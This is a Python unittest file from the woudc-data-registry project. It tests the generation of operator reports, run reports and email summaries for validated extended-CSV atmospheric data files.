| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b96699bfadc5ced08f362942f0c4f7b73a991e88
| 45,164
|
py
|
Python
|
woudc_data_registry/tests/test_report_generation.py
|
danielwaiforssell/woudc-data-registry
|
6049f4f31c81558e5a3fb58905e69ce3605cbc60
|
[
"MIT"
] | null | null | null |
woudc_data_registry/tests/test_report_generation.py
|
danielwaiforssell/woudc-data-registry
|
6049f4f31c81558e5a3fb58905e69ce3605cbc60
|
[
"MIT"
] | null | null | null |
woudc_data_registry/tests/test_report_generation.py
|
danielwaiforssell/woudc-data-registry
|
6049f4f31c81558e5a3fb58905e69ce3605cbc60
|
[
"MIT"
] | null | null | null |
import csv
import pathlib
import os
import unittest
from datetime import datetime
from woudc_data_registry import models, parser, report, util
SANDBOX_DIR = '/tmp/woudc-data-registry'
def dummy_extCSV(source):
"""
Returns a parser.ExtendedCSV instace built from the filepath <source>
with dummy output settings (no logs or reports).
"""
with report.OperatorReport() as error_bank:
return parser.ExtendedCSV(source, error_bank)
def resolve_test_data_path(test_data_file):
"""
helper function to ensure filepath is valid
for different testing context (setuptools, directly, etc.)
:param test_data_file: Relative path to an input file.
:returns: Full path to the input file.
"""
if os.path.exists(test_data_file):
return test_data_file
else:
path = os.path.join('woudc_data_registry', 'tests', test_data_file)
if os.path.exists(path):
return path
def clear_sandbox():
"""
Clean up report generation tests by deleting any files in the
sandbox directory.
"""
for filename in os.listdir(SANDBOX_DIR):
fullpath = os.path.join(SANDBOX_DIR, filename)
os.remove(fullpath)
class SandboxTestSuite(unittest.TestCase):
"""Superclass for test classes that write temporary files to a sandbox"""
def setUpClass():
os.mkdir(SANDBOX_DIR)
def tearDownClass():
os.rmdir(SANDBOX_DIR)
def tearDown(self):
clear_sandbox()
class OperatorReportTest(SandboxTestSuite):
"""Test suite for OperatorReport, error severity, and file format"""
def test_operator_report_output_location(self):
"""Test that operator reports write a file in the working directory"""
with report.OperatorReport(SANDBOX_DIR) as op_report:
operator_path = pathlib.Path(op_report.filepath())
self.assertEquals(str(operator_path.parent), SANDBOX_DIR)
def test_uses_error_definition(self):
"""Test that error/warning feedback responds to input files"""
# The two error files below have different error types for error 1.
all_warnings = resolve_test_data_path('config/all_warnings.csv')
all_errors = resolve_test_data_path('config/all_errors.csv')
with report.OperatorReport(SANDBOX_DIR) as op_report:
op_report.read_error_definitions(all_warnings)
self.assertIn(1, op_report._error_definitions)
_, success = op_report.add_message(1)
self.assertFalse(success)
op_report.read_error_definitions(all_errors)
self.assertIn(1, op_report._error_definitions)
_, success = op_report.add_message(1)
self.assertTrue(success)
def test_passing_operator_report(self):
"""Test that a passing file is written in the operator report"""
filename = '20080101.Kipp_Zonen.UV-S-E-T.000560.PMOD-WRC.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
with report.OperatorReport(SANDBOX_DIR) as op_report:
ecsv = parser.ExtendedCSV(contents, op_report)
ecsv.validate_metadata_tables()
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = filename
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
today = datetime.now().strftime('%Y-%m-%d')
output_path = os.path.join(SANDBOX_DIR,
'operator-report-{}.csv'.format(today))
op_report.add_message(200) # File passes validation
op_report.write_passing_file(infile, ecsv, data_record)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
reader = csv.reader(output)
next(reader)
report_line = next(reader)
self.assertEquals(report_line[0], 'P')
self.assertEquals(report_line[2], '200')
self.assertIn(agency, report_line)
self.assertIn(os.path.basename(infile), report_line)
with self.assertRaises(StopIteration):
next(reader)
def test_warning_operator_report(self):
"""Test that file warnings are written in the operator report"""
filename = 'ecsv-trailing-commas.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
with report.OperatorReport(SANDBOX_DIR) as op_report:
ecsv = parser.ExtendedCSV(contents, op_report)
# Some warnings are encountered during parsing.
ecsv.validate_metadata_tables()
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = filename
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
today = datetime.now().strftime('%Y-%m-%d')
output_path = os.path.join(SANDBOX_DIR,
'operator-report-{}.csv'.format(today))
op_report.add_message(200) # File passes validation
op_report.write_passing_file(infile, ecsv, data_record)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
reader = csv.reader(output)
next(reader)
expected_warnings = len(ecsv.warnings)
for _ in range(expected_warnings):
report_line = next(reader)
self.assertEquals(report_line[0], 'P')
self.assertEquals(report_line[1], 'Warning')
self.assertIn(agency, report_line)
self.assertIn(os.path.basename(infile), report_line)
report_line = next(reader)
self.assertEquals(report_line[0], 'P')
self.assertEquals(report_line[1], 'Warning')
self.assertEquals(report_line[2], '200')
self.assertIn(agency, report_line)
self.assertIn(os.path.basename(infile), report_line)
with self.assertRaises(StopIteration):
next(reader)
def test_failing_operator_report(self):
"""Test that a failing file is written in the operator report"""
filename = 'ecsv-missing-instrument-name.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
ecsv = None
agency = 'UNKNOWN'
with report.OperatorReport(SANDBOX_DIR) as op_report:
try:
ecsv = parser.ExtendedCSV(contents, op_report)
ecsv.validate_metadata_tables()
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
ecsv.validate_dataset_tables()
raise AssertionError('Parsing of {} did not fail'
.format(infile))
except (parser.MetadataValidationError,
parser.NonStandardDataError):
output_path = os.path.join(SANDBOX_DIR, 'run1')
op_report.add_message(209)
op_report.write_failing_file(infile, agency, ecsv)
today = datetime.now().strftime('%Y-%m-%d')
output_path = os.path.join(SANDBOX_DIR,
'operator-report-{}.csv'.format(today))
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
reader = csv.reader(output)
next(reader)
warnings = 0
errors = 0
expected_warnings = len(ecsv.warnings)
expected_errors = len(ecsv.errors)
for _ in range(expected_warnings + expected_errors):
report_line = next(reader)
self.assertEquals(report_line[0], 'F')
if report_line[1] == 'Warning':
warnings += 1
elif report_line[1] == 'Error':
errors += 1
self.assertEquals(warnings, expected_warnings)
self.assertEquals(errors, expected_errors)
report_line = next(reader)
self.assertEquals(report_line[0], 'F')
self.assertEquals(report_line[1], 'Error')
self.assertEquals(report_line[2], '209')
self.assertIn(agency, report_line)
self.assertIn(os.path.basename(infile), report_line)
with self.assertRaises(StopIteration):
next(reader)
def test_mixed_operator_report(self):
"""
Test that passing and failing files are written to the operator report
when a mixture of the two is processed
"""
infile_root = resolve_test_data_path('data/general/pass_and_fail')
warnings = {}
errors = {}
expected_warnings = {}
expected_errors = {}
agency = 'UNKNOWN'
with report.OperatorReport(SANDBOX_DIR) as op_report:
for infile in os.listdir(infile_root):
fullpath = os.path.join(infile_root, infile)
warnings[fullpath] = 0
errors[fullpath] = 0
try:
contents = util.read_file(fullpath)
ecsv = parser.ExtendedCSV(contents, op_report)
except (parser.MetadataValidationError,
parser.NonStandardDataError) as err:
expected_errors[fullpath] = len(err.errors)
op_report.add_message(209)
op_report.write_failing_file(fullpath, agency)
continue
try:
ecsv.validate_metadata_tables()
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = infile
expected_warnings[fullpath] = len(ecsv.warnings)
expected_errors[fullpath] = 0
op_report.write_passing_file(fullpath, ecsv, data_record)
except (parser.MetadataValidationError,
parser.NonStandardDataError):
expected_warnings[fullpath] = len(ecsv.warnings)
expected_errors[fullpath] = len(ecsv.errors)
op_report.add_message(209)
op_report.write_failing_file(fullpath, agency, ecsv)
today = datetime.now().strftime('%Y-%m-%d')
output_path = os.path.join(SANDBOX_DIR,
'operator-report-{}.csv'.format(today))
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
reader = csv.reader(output)
next(reader)
for line in reader:
if expected_errors[line[12]] == 0:
self.assertEquals(line[0], 'P')
self.assertEquals(line[1], 'Warning')
else:
self.assertEquals(line[0], 'F')
if line[2] == '200':
self.assertEquals(expected_errors[line[12]], 0)
elif line[2] == '209':
self.assertGreater(expected_errors[line[12]], 0)
elif line[1] == 'Warning':
warnings[line[12]] += 1
elif line[1] == 'Error':
errors[line[12]] += 1
self.assertEquals(warnings, expected_warnings)
self.assertEquals(errors, expected_errors)
class RunReportTest(SandboxTestSuite):
"""Test suite for RunReport, file writing and file format"""
def test_run_report_output_location(self):
"""Test that run reports write a file in the working directory"""
run_report = report.RunReport(SANDBOX_DIR)
run_report_path = pathlib.Path(run_report.filepath())
self.assertEquals(str(run_report_path.parent), SANDBOX_DIR)
def test_passing_run_report(self):
"""Test that a passing file is written to the run report"""
filename = '20080101.Kipp_Zonen.UV-S-E-T.000560.PMOD-WRC.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
run_report = report.RunReport(SANDBOX_DIR)
with report.OperatorReport() as error_bank:
ecsv = parser.ExtendedCSV(contents, error_bank)
ecsv.validate_metadata_tables()
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = filename
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
output_path = os.path.join(SANDBOX_DIR, 'run_report')
run_report.write_passing_file(infile, agency)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 2)
self.assertEquals(lines[0], agency)
self.assertEquals(lines[1], 'Pass: {}'.format(infile))
def test_failing_run_report(self):
"""Test that a failing file is written to the run report"""
filename = 'ecsv-missing-instrument-name.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
ecsv = None
# Agency typically filled in with FTP username for failing files.
agency = 'rmda'
with report.OperatorReport() as error_bank:
run_report = report.RunReport(SANDBOX_DIR)
try:
ecsv = parser.ExtendedCSV(contents, error_bank)
ecsv.validate_metadata_tables()
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
ecsv.validate_dataset_tables()
raise AssertionError('Parsing of {} did not fail'
.format(infile))
except (parser.MetadataValidationError,
parser.NonStandardDataError):
output_path = os.path.join(SANDBOX_DIR, 'run_report')
run_report.write_failing_file(infile, agency)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 2)
self.assertEquals(lines[0], agency)
self.assertEquals(lines[1], 'Fail: {}'.format(infile))
def test_non_extcsv_run_report(self):
    """Test that an unparseable file is written to the run report"""
    filename = 'not-an-ecsv.dat'
    infile = resolve_test_data_path('data/general/{}'.format(filename))
    contents = util.read_file(infile)

    # Agency is unknown since the file cannot be parsed at all.
    agency = 'UNKNOWN'

    with report.OperatorReport() as error_bank:
        run_report = report.RunReport(SANDBOX_DIR)

        try:
            _ = parser.ExtendedCSV(contents, error_bank)

            # AssertionError is not caught below, so reaching here
            # correctly fails the test.
            raise AssertionError('Parsing of {} did not fail'
                                 .format(infile))
        except (parser.MetadataValidationError,
                parser.NonStandardDataError):
            output_path = os.path.join(SANDBOX_DIR, 'run_report')
            run_report.write_failing_file(infile, agency)

            self.assertTrue(os.path.exists(output_path))
            with open(output_path) as output:
                lines = output.read().splitlines()

                # One agency header line plus one 'Fail:' entry.
                # assertEquals (deprecated alias) replaced by assertEqual.
                self.assertEqual(len(lines), 2)
                self.assertEqual(lines[0], agency)
                self.assertEqual(lines[1], 'Fail: {}'.format(infile))
def test_mixed_run_report(self):
    """
    Test that passing and failing files are written to the run report
    when a mixture of the two is processed
    """
    infile_root = resolve_test_data_path('data/general/pass_and_fail')
    agency = 'MSC'

    expected_passes = set()
    expected_fails = set()

    with report.OperatorReport() as error_bank:
        run_report = report.RunReport(SANDBOX_DIR)

        for infile in os.listdir(infile_root):
            fullpath = os.path.join(infile_root, infile)

            try:
                contents = util.read_file(fullpath)
                ecsv = parser.ExtendedCSV(contents, error_bank)
            except (parser.MetadataValidationError,
                    parser.NonStandardDataError):
                # Could not even be parsed: record as a failure.
                expected_fails.add(fullpath)
                run_report.write_failing_file(fullpath, agency)
                continue

            try:
                ecsv.validate_metadata_tables()
                ecsv.validate_dataset_tables()

                data_record = models.DataRecord(ecsv)
                data_record.filename = infile

                expected_passes.add(fullpath)
                run_report.write_passing_file(fullpath, agency)
            except (parser.MetadataValidationError,
                    parser.NonStandardDataError):
                expected_fails.add(fullpath)
                run_report.write_failing_file(fullpath, agency)

    # The fixture directory contains 6 passing and 4 failing files.
    # assertEquals (deprecated alias) replaced by assertEqual throughout.
    self.assertEqual(len(expected_passes), 6)
    self.assertEqual(len(expected_fails), 4)

    output_path = os.path.join(SANDBOX_DIR, 'run_report')
    self.assertTrue(os.path.exists(output_path))

    with open(output_path) as output:
        lines = output.read().splitlines()

        # First line is the agency; every other line is one file entry.
        self.assertEqual(lines[0], agency)
        self.assertEqual(len(lines),
                         len(expected_passes) + len(expected_fails) + 1)

        for line in lines[1:]:
            if line.startswith('Pass'):
                target = line[6:].strip()
                self.assertIn(target, expected_passes)
            elif line.startswith('Fail'):
                target = line[6:].strip()
                self.assertIn(target, expected_fails)
def test_run_report_multiple_agencies(self):
    """Test that files in the run report are grouped by agency"""
    infile_root = resolve_test_data_path('data/general/agencies')

    expected_passes = {}
    expected_fails = {}

    # Maps directory names (FTP usernames) to canonical agency names.
    agency_aliases = {
        'msc': 'MSC',
        'casiap': 'CAS-IAP',
        'mlcd-lu': 'MLCD-LU',
        'dwd-mohp': 'DWD-MOHp'
    }

    with report.OperatorReport() as error_bank:
        run_report = report.RunReport(SANDBOX_DIR)

        for dirpath, dirnames, filenames in os.walk(infile_root):
            for infile in filenames:
                fullpath = os.path.join(dirpath, infile)
                # Agency inferred from directory name.
                agency = dirpath.split('/')[-1]

                try:
                    contents = util.read_file(fullpath)
                    ecsv = parser.ExtendedCSV(contents, error_bank)
                except (parser.MetadataValidationError,
                        parser.NonStandardDataError):
                    # setdefault replaces the original repeated
                    # 'if agency not in ...' initialization blocks.
                    expected_passes.setdefault(agency, set())
                    expected_fails.setdefault(agency, set())

                    expected_fails[agency].add(fullpath)
                    run_report.write_failing_file(fullpath, agency)
                    continue

                try:
                    ecsv.validate_metadata_tables()
                    agency = ecsv.extcsv['DATA_GENERATION']['Agency']

                    expected_passes.setdefault(agency, set())
                    expected_fails.setdefault(agency, set())

                    ecsv.validate_dataset_tables()
                    data_record = models.DataRecord(ecsv)
                    data_record.filename = infile

                    expected_passes[agency].add(fullpath)
                    run_report.write_passing_file(fullpath, agency)
                except (parser.MetadataValidationError,
                        parser.NonStandardDataError):
                    # NOTE(review): this lookup assumes a failure here
                    # happens before the agency name is replaced by the
                    # canonical one above (alias keys are directory
                    # names only) — holds for the current fixtures.
                    agency = agency_aliases[agency]

                    expected_passes.setdefault(agency, set())
                    expected_fails.setdefault(agency, set())

                    expected_fails[agency].add(fullpath)
                    run_report.write_failing_file(fullpath, agency)

    # assertEquals (deprecated alias) replaced by assertEqual throughout.
    self.assertEqual(len(expected_passes['CAS-IAP']), 1)
    self.assertEqual(len(expected_passes['DWD-MOHp']), 2)
    self.assertEqual(len(expected_passes['MLCD-LU']), 3)
    self.assertEqual(len(expected_passes['MSC']), 4)

    self.assertEqual(len(expected_fails['CAS-IAP']), 0)
    self.assertEqual(len(expected_fails['DWD-MOHp']), 1)
    self.assertEqual(len(expected_fails['MLCD-LU']), 0)
    self.assertEqual(len(expected_fails['MSC']), 1)

    output_path = os.path.join(SANDBOX_DIR, 'run_report')
    self.assertTrue(os.path.exists(output_path))

    with open(output_path) as output:
        lines = output.read().splitlines()
        curr_agency = None

        # Entries are grouped under agency header lines; a non-empty
        # line that is neither Pass nor Fail starts a new agency group.
        for line in lines:
            if line.startswith('Pass'):
                target = line[6:]
                self.assertIn(target, expected_passes[curr_agency])
            elif line.startswith('Fail'):
                target = line[6:]
                self.assertIn(target, expected_fails[curr_agency])
            elif line.strip() != '':
                curr_agency = line.strip()
                self.assertIn(line, agency_aliases.values())
class EmailSummaryTest(SandboxTestSuite):
    """
    Test suite for EmailSummary, output format, and detection of passes,
    fixes, and fails
    """

    def _summary_lines(self, input_root, emails):
        """
        Generate an email summary from the operator reports under
        <input_root>, assert the summary file was written to SANDBOX_DIR
        under today's date, and return its contents as a list of lines.

        Private helper shared by the write-and-check tests below;
        replaces a block of code previously duplicated in each of them.
        """
        email_report = report.EmailSummary(input_root, SANDBOX_DIR)
        email_report.write(emails)

        today = datetime.now().strftime('%Y-%m-%d')
        output_filename = 'failed-files-{}'.format(today)
        output_path = os.path.join(SANDBOX_DIR, output_filename)

        self.assertTrue(os.path.exists(output_path))
        with open(output_path) as output:
            return output.read().splitlines()

    def _check_four_agency_summary(self, lines):
        """
        Assert the expected contents of the four-agency email summary
        shared by the multiple-agencies and multiple-runs tests.

        assertEquals (deprecated alias, removed in Python 3.12) is
        replaced by assertEqual throughout this class.
        """
        self.assertEqual(len(lines), 29)

        self.assertEqual(lines[0], 'CAS-IAP (casiap@mail.com)')
        self.assertEqual(lines[1], 'Total files received: 1')
        self.assertEqual(lines[2], 'Number of passed files: 1')
        self.assertEqual(lines[3], 'Number of manually repaired files: 0')
        self.assertEqual(lines[4], 'Number of failed files: 0')

        self.assertEqual(lines[6], 'DWD-MOHp (dwd@mail.com)')
        self.assertEqual(lines[7], 'Total files received: 3')
        self.assertEqual(lines[8], 'Number of passed files: 2')
        self.assertEqual(lines[9], 'Number of manually repaired files: 0')
        self.assertEqual(lines[10], 'Number of failed files: 1')
        self.assertEqual(lines[11], 'Summary of Failures:')
        self.assertNotIn('.csv', lines[12])
        self.assertEqual(lines[13], 'file2.csv')

        self.assertEqual(lines[15], 'MLCD-LU (mlcd@mail.com)')
        self.assertEqual(lines[16], 'Total files received: 3')
        self.assertEqual(lines[17], 'Number of passed files: 3')
        self.assertEqual(lines[18],
                         'Number of manually repaired files: 0')
        self.assertEqual(lines[19], 'Number of failed files: 0')

        self.assertEqual(lines[21], 'MSC (msc@mail.com)')
        self.assertEqual(lines[22], 'Total files received: 5')
        self.assertEqual(lines[23], 'Number of passed files: 4')
        self.assertEqual(lines[24],
                         'Number of manually repaired files: 0')
        self.assertEqual(lines[25], 'Number of failed files: 1')
        self.assertEqual(lines[26], 'Summary of Failures:')
        self.assertNotIn('.csv', lines[27])
        self.assertEqual(lines[28], 'file4.csv')

    def test_email_summary_output_location(self):
        """Test that email summaries write a file in the working directory"""
        email_report = report.EmailSummary(SANDBOX_DIR)
        email_report_path = pathlib.Path(email_report.filepath())

        self.assertEqual(str(email_report_path.parent), SANDBOX_DIR)

    def test_find_operator_report_empty(self):
        """Test that no operator reports are found when none exist"""
        project_root = resolve_test_data_path('data/reports')

        email_report = report.EmailSummary(project_root)
        operator_reports = email_report.find_operator_reports()

        self.assertEqual([], operator_reports)

    def test_find_operator_report_one_run(self):
        """Test that operator reports are found when one exists"""
        project_root = resolve_test_data_path('data/reports/one_pass')

        email_report = report.EmailSummary(project_root)
        operator_reports = email_report.find_operator_reports()

        expected_parent = resolve_test_data_path('data/reports/one_pass/run1')
        self.assertEqual(1, len(operator_reports))
        self.assertIn(expected_parent, operator_reports[0])

    def test_find_operator_report_many_runs(self):
        """
        Test that all operator reports are found when they are spread
        across multiple run directories
        """
        project_root = resolve_test_data_path('data/reports/six_reports')

        email_report = report.EmailSummary(project_root)
        operator_reports = email_report.find_operator_reports()

        expected_path_pattern = \
            'data/reports/six_reports/run{}/operator-report-9999-12-31.csv'

        self.assertEqual(6, len(operator_reports))
        for run_number in range(1, 6 + 1):
            expected_path = resolve_test_data_path(
                expected_path_pattern.format(run_number))
            self.assertIn(expected_path, set(operator_reports))

    def test_email_summary_single_pass(self):
        """Test email report generation for a single passing file"""
        input_root = resolve_test_data_path('data/reports/one_pass')
        emails = {'MSC': 'placeholder@site.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 5)
        self.assertEqual(lines[0], 'MSC (placeholder@site.com)')
        self.assertEqual(lines[1], 'Total files received: 1')
        self.assertEqual(lines[2], 'Number of passed files: 1')
        self.assertEqual(lines[3], 'Number of manually repaired files: 0')
        self.assertEqual(lines[4], 'Number of failed files: 0')

    def test_email_summary_single_fail(self):
        """Test email report generation for a single failing file"""
        input_root = resolve_test_data_path('data/reports/one_fail')
        emails = {'MSC': 'placeholder@site.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 8)
        self.assertEqual(lines[0], 'MSC (placeholder@site.com)')
        self.assertEqual(lines[1], 'Total files received: 1')
        self.assertEqual(lines[2], 'Number of passed files: 0')
        self.assertEqual(lines[3], 'Number of manually repaired files: 0')
        self.assertEqual(lines[4], 'Number of failed files: 1')

        self.assertEqual(lines[5], 'Summary of Failures:')
        # Line 6 is the error description; the failing file follows.
        self.assertNotIn('.csv', lines[6])
        self.assertEqual(lines[7], 'file1.csv')

    def test_email_summary_one_run_mixed_pass_fail(self):
        """
        Test email report generation with passing and failing files
        all in one operator report
        """
        input_root = resolve_test_data_path('data/reports//pass_and_fail')
        emails = {'MSC': 'placeholder@site.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 10)
        self.assertEqual(lines[0], 'MSC (placeholder@site.com)')
        self.assertEqual(lines[1], 'Total files received: 5')
        self.assertEqual(lines[2], 'Number of passed files: 2')
        self.assertEqual(lines[3], 'Number of manually repaired files: 0')
        self.assertEqual(lines[4], 'Number of failed files: 3')

        self.assertEqual(lines[5], 'Summary of Failures:')
        self.assertNotIn('.csv', lines[6])
        # Alphabetical order of files: the first one has capital F.
        self.assertEqual(lines[7], 'File5.csv')
        self.assertEqual(lines[8], 'file2.csv')
        self.assertEqual(lines[9], 'file3.csv')

    def test_email_summary_multiple_causes_one_group(self):
        """
        Test email report generation where a single group of files
        experiences multiple error types.
        """
        input_root = resolve_test_data_path('data/reports/multiple_causes')
        emails = {'MSC': 'placeholder@site.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 12)
        self.assertEqual(lines[0], 'MSC (placeholder@site.com)')
        self.assertEqual(lines[1], 'Total files received: 5')
        self.assertEqual(lines[2], 'Number of passed files: 2')
        self.assertEqual(lines[3], 'Number of manually repaired files: 0')
        self.assertEqual(lines[4], 'Number of failed files: 3')

        self.assertEqual(lines[5], 'Summary of Failures:')
        # Three error descriptions shared by all the files below.
        self.assertNotIn('.csv', lines[6])
        self.assertNotIn('.csv', lines[7])
        self.assertNotIn('.csv', lines[8])
        # Alphabetical order of files: the first one has capital F.
        self.assertEqual(lines[9], 'File5.csv')
        self.assertEqual(lines[10], 'file2.csv')
        self.assertEqual(lines[11], 'file3.csv')

    def test_email_summary_multiple_agencies(self):
        """Test email report generation where input has multiple agencies"""
        input_root = resolve_test_data_path('data/reports/agencies')
        emails = {
            'CAS-IAP': 'casiap@mail.com',
            'DWD-MOHp': 'dwd@mail.com',
            'MLCD-LU': 'mlcd@mail.com',
            'MSC': 'msc@mail.com'
        }

        lines = self._summary_lines(input_root, emails)
        self._check_four_agency_summary(lines)

    def test_email_summary_multiple_runs(self):
        """Test email report generation across multiple operator reports"""
        input_root = resolve_test_data_path('data/reports/multiple_runs')
        emails = {
            'CAS-IAP': 'casiap@mail.com',
            'DWD-MOHp': 'dwd@mail.com',
            'MLCD-LU': 'mlcd@mail.com',
            'MSC': 'msc@mail.com'
        }

        lines = self._summary_lines(input_root, emails)
        self._check_four_agency_summary(lines)

    def test_email_summary_single_fix(self):
        """
        Test email report generation for a single file that is fixed
        between two operator reports
        """
        input_root = resolve_test_data_path('data/reports/one_fix')
        emails = {'MSC': 'placeholder@mail.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 8)
        self.assertEqual(lines[0], 'MSC (placeholder@mail.com)')
        self.assertEqual(lines[1], 'Total files received: 1')
        self.assertEqual(lines[2], 'Number of passed files: 0')
        self.assertEqual(lines[3], 'Number of manually repaired files: 1')
        self.assertEqual(lines[4], 'Number of failed files: 0')

        self.assertEqual(lines[5], 'Summary of Fixes:')
        self.assertNotIn('.csv', lines[6])
        self.assertEqual(lines[7], 'file1.csv')

    def test_email_report_mixed_pass_fix(self):
        """
        Test email report generation when some files pass immediately
        and others are fixed between runs.
        """
        input_root = resolve_test_data_path('data/reports/pass_and_fix')
        emails = {'MSC': 'placeholder@mail.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 11)
        self.assertEqual(lines[0], 'MSC (placeholder@mail.com)')
        self.assertEqual(lines[1], 'Total files received: 9')
        self.assertEqual(lines[2], 'Number of passed files: 5')
        self.assertEqual(lines[3], 'Number of manually repaired files: 4')
        self.assertEqual(lines[4], 'Number of failed files: 0')

        self.assertEqual(lines[5], 'Summary of Fixes:')
        self.assertNotIn('.csv', lines[6])
        self.assertEqual(lines[7], 'File5.csv')
        self.assertEqual(lines[8], 'file2.csv')
        self.assertEqual(lines[9], 'file3.csv')
        self.assertEqual(lines[10], 'file9.csv')

    def test_email_report_mixed_fail_fix(self):
        """
        Test email report generation when some files fail irrecoverably
        and others are fixed between runs
        """
        input_root = resolve_test_data_path('data/reports/fix_and_fail')
        emails = {'MSC': 'placeholder@mail.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 17)
        self.assertEqual(lines[0], 'MSC (placeholder@mail.com)')
        self.assertEqual(lines[1], 'Total files received: 8')
        self.assertEqual(lines[2], 'Number of passed files: 0')
        self.assertEqual(lines[3], 'Number of manually repaired files: 3')
        self.assertEqual(lines[4], 'Number of failed files: 5')

        self.assertEqual(lines[5], 'Summary of Failures:')
        self.assertNotIn('.csv', lines[6])
        self.assertEqual(lines[7], 'file1.csv')
        self.assertEqual(lines[8], 'file3.csv')
        self.assertEqual(lines[9], 'file4.csv')
        self.assertEqual(lines[10], 'file7.csv')
        self.assertEqual(lines[11], 'file8.csv')

        self.assertEqual(lines[12], 'Summary of Fixes:')
        self.assertNotIn('.csv', lines[13])
        self.assertEqual(lines[14], 'file2.csv')
        self.assertEqual(lines[15], 'file5.csv')
        self.assertEqual(lines[16], 'file6.csv')

    def test_email_summary_fix_but_still_fail(self):
        """
        Test email report generation when files are fixed between runs,
        only to have an irrecoverable error show up.
        """
        input_root = resolve_test_data_path('data/reports/fail_twice')
        emails = {'MSC': 'placeholder@mail.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 8)
        self.assertEqual(lines[0], 'MSC (placeholder@mail.com)')
        self.assertEqual(lines[1], 'Total files received: 1')
        self.assertEqual(lines[2], 'Number of passed files: 0')
        self.assertEqual(lines[3], 'Number of manually repaired files: 0')
        self.assertEqual(lines[4], 'Number of failed files: 1')

        self.assertEqual(lines[5], 'Summary of Failures:')
        self.assertNotIn('.csv', lines[6])
        self.assertEqual(lines[7], 'file1.csv')

    def test_email_summary_mixed_pass_fix_fail(self):
        """
        Test email report generation when some files pass immediately,
        some fail irrecoverably, and others are fixed between runs.
        """
        input_root = resolve_test_data_path('data/reports/pass_fix_fail')
        emails = {'MSC': 'placeholder@mail.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 19)

        # Output may be sorted in various ways, so just check that all
        # files are in the right block and are all accounted for.
        fail_group = ['file4.csv', 'file9.csv']
        first_fix_of_pair = ['file2.csv', 'file6.csv']
        second_fix_of_pair = ['file3.csv', 'file8.csv']

        self.assertEqual(lines[0], 'MSC (placeholder@mail.com)')
        self.assertEqual(lines[1], 'Total files received: 11')
        self.assertEqual(lines[2], 'Number of passed files: 5')
        self.assertEqual(lines[3], 'Number of manually repaired files: 4')
        self.assertEqual(lines[4], 'Number of failed files: 2')

        self.assertEqual(lines[5], 'Summary of Failures:')
        self.assertNotIn('.csv', lines[6])
        self.assertIn(lines[7], fail_group)
        self.assertNotIn('.csv', lines[8])
        self.assertIn(lines[9], fail_group)

        self.assertEqual(lines[10], 'Summary of Fixes:')
        self.assertNotIn('.csv', lines[11])
        self.assertNotIn('.csv', lines[12])
        self.assertIn(lines[13], first_fix_of_pair)
        self.assertIn(lines[14], second_fix_of_pair)
        self.assertNotIn('.csv', lines[15])
        self.assertNotIn('.csv', lines[16])
        self.assertIn(lines[17], first_fix_of_pair)
        self.assertIn(lines[18], second_fix_of_pair)

    def test_email_summary_multiple_causes(self):
        """
        Test email report generation when files fail or are fixed due to
        multiple different issues.
        """
        input_root = resolve_test_data_path(
            'data/reports/multiple_causes_two_runs')
        emails = {'MSC': 'placeholder@mail.com'}

        lines = self._summary_lines(input_root, emails)

        self.assertEqual(len(lines), 17)
        self.assertEqual(lines[0], 'MSC (placeholder@mail.com)')
        self.assertEqual(lines[1], 'Total files received: 5')
        self.assertEqual(lines[2], 'Number of passed files: 0')
        self.assertEqual(lines[3], 'Number of manually repaired files: 2')
        self.assertEqual(lines[4], 'Number of failed files: 3')

        fix_group = ['file1.csv', 'file3.csv']
        fail_group = ['file2.csv', 'file4.csv', 'file5.csv']

        self.assertEqual(lines[5], 'Summary of Failures:')
        self.assertNotIn('.csv', lines[6])
        self.assertIn(lines[7], fail_group)
        self.assertNotIn('.csv', lines[8])
        self.assertIn(lines[9], fail_group)
        self.assertNotIn('.csv', lines[10])
        self.assertIn(lines[11], fail_group)

        self.assertEqual(lines[12], 'Summary of Fixes:')
        self.assertNotIn('.csv', lines[13])
        self.assertIn(lines[14], fix_group)
        self.assertNotIn('.csv', lines[15])
        self.assertIn(lines[16], fix_group)

        # Check that all error causes (messages) are distinct.
        self.assertEqual(len(set([lines[6], lines[8], lines[10]])), 3)
